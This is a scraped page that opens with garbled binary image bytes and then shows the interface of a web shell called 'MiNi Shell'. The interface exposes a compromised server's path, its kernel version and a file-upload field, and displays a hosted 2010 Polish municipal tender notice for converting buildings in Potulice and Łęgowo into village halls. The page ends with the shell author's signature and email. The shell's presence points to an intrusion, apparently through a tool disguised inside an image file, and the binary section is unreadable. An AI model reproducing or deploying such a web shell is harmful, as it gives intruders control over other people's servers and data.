JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/16766-N-2010.html

<p class="kh_header"><b>Wągrowiec: Adaptacja obiektów gminnych we wsiach Potulice i Łęgowo na świetlice wraz z wyposażeniem</b><br>
<b>Numer ogłoszenia: 16766 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wągrowiec , ul. Cysterska 22, 62-100 Wągrowiec, woj. wielkopolskie, tel. 067 2680800, faks 067 2680803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wagrowiec.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja obiektów gminnych we wsiach Potulice i Łęgowo na świetlice wraz z wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje  wykonanie dwóch zadań:
Zadanie Nr 1 - Rozbudowa ze zmianą sposobu użytkowania budynku gospodarczego na świetlicę wiejską w Łęgowie
Zakres prac obejmuje wykonanie wszelkich robót budowlanych (rozbudowy oraz remontowo - modernizacyjnych) prowadzących do dostosowania budynku do nowej funkcji, jego wyposażenie oraz zagospodarowanie terenu działki. Obiekt stanowi budynek parterowy  bez podpiwniczenia. Łączna powierzchnia użytkowa pomieszczeń po rozbudowie i zmianie funkcji 193,03m2  oraz taras o pow. 63,65m2.
Przy kompleksowej realizacji zadania wykonać należy pełen zakres robót budowlanych instalacyjnych - instalacji sanitarnych i elektrycznych a w szczególności:
ROBOTY OGÓLNOBUDOWLANE: roboty rozbiórkowe; ściany osłonowe i ścianki działowe; wykonanie elementów żelbetowych konstrukcyjnych; posadzki z podłożami; okna; drzwi - wewnętrzne i zewnętrzne, ścianki systemowe z drzwiami; tynki i okładziny wewnętrzne; malowanie ścian i sufitów; docieplenie i pokrycie stropodachu; taras zewnętrzny i wejście do budynku z kostki betonowej, elewacja z dociepleniem.
ZAGOSPODAROWANIE TERENU DZIAŁKI na powierzchni terenu  611,05m2;
Roboty ziemne; utwardzenie terenu w granicach działki - drogi dojazdowe, parking przy obiekcie; wykonanie chodnika - dojścia do budynku; zadaszony, murowany zasiek na kontener na śmieci; ogrodzenie
INSTALACJE SANITARNE
W zakres robót instalacji sanitarnych wchodzi: wewnętrzna instalacja wodociągowa, wewnętrzna instalacja kanalizacyjna; instalacja centralnego ogrzewania; kocioł gazowy centralnego ogrzewania z osprzętem; wentylacja; instalacja gazowa wewnętrzna; przyłącze wodociągowe; przyłącze kanalizacyjne; przyłącze gazowe.
INSTALACJA ELEKTRYCZNA
W zakres prac elektrycznych wchodzą następujące elementy. instalacja piorunochronowa; uziemienia i połączenia wyrównawcze; obwód wyłącznika przeciwpożarowego; obwód zasilania rozdzielnicy głównej RG; obwód zasilania wentylatorów wyciągowych; obwód gniazd i oświetlenia budynku.
WYPOSAŻENIE OBIEKTU - stoły, krzesła, szafy, szafki, wieszaki, lodówka, zmywarka, hermetyczne kosze na odpady.
	Zadanie NR 2 - Zmiana sposobu użytkowania sklepu spożywczo przemysłowego na świetlicę wiejska w Potulicach
Zakres prac obejmuje wykonanie wszelkich robót budowlanych (remontowo - modernizacyjnych)  prowadzących do dostosowania budynku do nowej funkcji,  jego wyposażenie oraz zagospodarowanie terenu działki.
Obiekt stanowi budynek parterowy częściowo podpiwniczony.
Łączna powierzchnia pomieszczeń po zmianie (parteru i piwnicy) wynosi 212,51m2. W zakres prac wchodzi również wyremontowanie  pomieszczeń piwnicznych w tym zmodernizowanie kotłowni.
Przy kompleksowej realizacji zadania wykonać należy pełen zakres robót budowlanych instalacyjnych - instalacji sanitarnych i elektrycznych a w szczególności: 
ROBOTY OGÓLNOBUDOWLANE - roboty rozbiórkowe - rozbiórka elementów wykonanych z cegieł i betonu; roboty murowe - wykonanie ścian, ścianek i kominów;  wykonanie i uzupełnienie elementów z betonu; okna; drzwi - wewnętrzne i zewnętrzne; tynki o okładziny wewnętrzne; malowanie - ścian i sufitów, wykonanie lamperii; posadzki z podłożami; remont dachu z dociepleniem; elewacja z dociepleniem; montaż elementów kowalsko ślusarskich; wentylacja; 
ZAGOSPODAROWANIE TERENU (w granicach działki) - nawierzchnia z kostki betonowej, ogrodzenie,  zieleń - trawniki, krzewy iglaste.
ROBOTY SANITARNE - wewnętrzna instalacja wodociągowa; wewnętrzna instalacja kanalizacyjna; kocioł c.o. z osprzętem; instalacja centralnego ogrzewania;
ROBOTY ELEKTRYCZNE - instalacja piorunochronowa, uziemienia i połączenia wyrównawcze; obwód wyłącznika p.poż.; obwód zasilania rozdzielnicy głównej RG; obwód gniazd i oświetlenia budynku; 
WYPOSAŻENIE - stoły, krzesła, szafy, szafki, regały, wieszaki, biurko,  lodówka, zmywarka, kuchenka, hermetyczne kosze na odpady.
2. Roboty budowlane - remontowe objęte zamówieniem wykonać należy zgodnie ze sztuką budowlaną, dokumentacją projektową, specyfikacją istotnych warunków zamówienia, specyfikacją techniczną wykonania i odbioru robót.
Szczegółowy zakres robót do wykonania - wg załączonych przedmiarów robót dla poszczególnych zadań..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.11.13.00-1, 45.11.12.91-4, 45.11.27.10-5, 45.20.00.00-9, 45.26.25.20-2, 45.26.23.11-4, 45.26.00.00-7, 45.23.31.00-8, 45.33.12.10-1, 45.33.20.00-3, 45.33.11.10-0, 45.33.11.00-7, 45.31.12.00-2, 45.42.11.00-5, 45.43.00.00-0, 45.44.21.00-8, 45.44.30.00-4, 45.42.11.60-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium 25 000,00. zł. Termin wniesienia wadium - 10.02.2010r. godz. 9.00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O zamówienie mogą ubiegać się  Wykonawcy, którzy spełnią  warunki określone w Art.22 ust.1 oraz nie podlegający wykluczeniu z postępowania na podstawie art. 24 ust.1i 2 ustawy Prawo zamówień publicznych a w szczególności:
1) posiadają uprawnienia do wykonywania działalności lub czynności , jeżeli przepisy prawa nakładają obowiązek ich posiadania  i w tym względzie są przedsiębiorcami w rozumieniu Art.2 i Art. 4  ust.1 i 2, prowadzącymi działalność gospodarczą zgodnie z Art. 14 ust.1 ustawy z dnia 2 lipca 2004roku o swobodzie działalności gospodarczej (Dz.U. z 2007 r. Nr 155, poz. 1095 ze zmianami)
2) posiadają wiedzę i doświadczenie - wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru), że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli co najmniej 2 zamówienia odpowiadające swoim rodzajem      i wartością robotom  stanowiącym przedmiot zamówienia tj. co najmniej 400.000,00 złotych każde.(w tym minimum jedno zamówienie polegające na budowie, przebudowie, rozbudowie, remoncie obiektu kubaturowego).
3) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - zapewnią nadzór nad prowadzonymi robotami  w postaci - kierownika budowy oraz kierowników robót  posiadających uprawnienia do wykonywania samodzielnych funkcji  technicznych w budownictwie (w zakresie objętym zamówieniem tj. robót budowlanych, instalacyjnych i elektrycznych)
Kadra budowy musi posiadać stwierdzenie przygotowania zawodowego do wykonana samodzielnych funkcji w budownictwie (uprawnienia) oraz wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego.
4) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a) posiadają na realizację przedmiotowego zamówienia środki finansowe lub zdolność kredytową w wysokości 300 000,00 zł.
b) posiadają ubezpieczenie od odpowiedzialności cywilnej w ramach prowadzonej działalności gospodarczej.
2. Zamawiający może polegać na wiedzy, doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawia w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonywaniu zamówienia,.
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
1) każdy z osobna posiada uprawnienia do prowadzenia działalności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień oraz że brak jest podstaw do wykluczenia na podstawie Art.24 ust.1 ustawy Pzp
2) wspólnie muszą wykazać, że spełnią warunki dotyczące wiedzy i doświadczenia, potencjału technicznego, dysponowania osobami zdolnymi do wykonania zamówienia, i posiadają odpowiednią sytuację ekonomiczną i finansową.
4. Zamawiający dokona oceny spełnienia warunków na podstawie dostarczonych dokumentów poprzez stwierdzenie: SPEŁNIA / NIE SPEŁNIA.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia przez Wykonawcę warunków udziału w postępowaniu oraz w celu wykazania braku podstaw do wykluczenia z postępowania, Wykonawcy zobowiązani są załączyć do oferty następujące dokumenty:
Dokumenty w celu wykazania braku podstaw do wykluczenia:
1) oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania (Art.24 ust.1)- zgodnie załącznikiem Nr 2 do SIWZ 
2) aktualny odpis z właściwego rejestru, jeśli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy Prawo zamówień publicznych 
3) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert - na potwierdzenie  braku podstaw do wykluczenia z postępowania.
4) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert - na potwierdzenie braku podstaw do wykluczenia  z postępowania.

Dokumenty na potwierdzenie spełnienia przez Wykonawcę warunków udziału w postępowaniu:
5) oświadczenie o spełnieniu warunków określonych  w  art. 22 ust.1 pkt.1-4  ustawy Prawo zamówień  publicznych - wg załącznika nr 3 do SIWZ. (jeśli oferta jest składana wspólnie przez kilka podmiotów - nadzy złożyć jedno oświadczenie podpisane przez wszystkich partnerów lub ich pełnomocnika).
6) wykaz wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - na potwierdzenie spełnienia warunku VI.1.2 - wg załącznika nr 4 do SIWZ
7) wykaz osób - odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia, a także zakresu wykonanych przez nie czynności, oraz informacje o podstawie do dysponowania tymi osobami wraz z oświadczeniem, że osoby te posiadają wymagane uprawnienia - na potwierdzenie spełnienia warunku VI.1.3- wg załącznika nr 5 do SIWZ.
8) informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed terminem składania ofert. - na spełnienie warunku VI.1.4.a.
9) opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na potwierdzenie spełnienia warunku VI.1.4 b.
2. Ponadto do oferty należy dołączyć :
1) dowód wniesienia wadium
2) wykaz części zamówienia, które zostaną powierzone podwykonawcom. Wg załącznika nr 6 do SIWZ.
3) kosztorys ofertowy - uproszczony lub szczegółowy z podaniem cen jednostkowych wykonania robót, oraz z informacją o zastosowanych stawkach czynników produkcji (roboczogodzinie, kosztach zakupu, kosztach pośrednich i zysku)
4) w celu stwierdzenia, czy osoba podpisująca oświadczenia woli lub udzielająca pełnomocnictwa posiada do tego uprawnienia, do oferty należy dołączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej
1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w punkcie VII.1.2; VII.1.3; i VII.1.4;. Wykonawca składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2) Jeśli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.   
4. Udział w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni załączyć do oferty wykaz podmiotów wspólnie ubiegających się o zamówienie,
2) Wykonawcy wspólnie ubiegający się o zamówienie powinni załączyć do oferty pełnomocnictwo udzielone jednemu z partnerów  do reprezentacji w postępowaniu podmiotów wspólnie ubiegających się o zamówienie, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3) Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty, o których mowa w rozdziale VII.1.1.; VII.1.2; VII.1.3; VII.1.4; VII.1.5; VII.1.9. VII.2.4..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.wagrowiec.wlkp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wągrowiec ul.Cysterska 22, 62-100 Wągrowiec pok.210.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 09:00, miejsce: Siedziba Zamawiającego
62-100 Wągrowiec ul. Cysterska 22, pokój 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków
Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich
w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013
Działanie - Odnowa i Rozwój Wsi

Creat By MiNi SheLL
Email: jattceo@gmail.com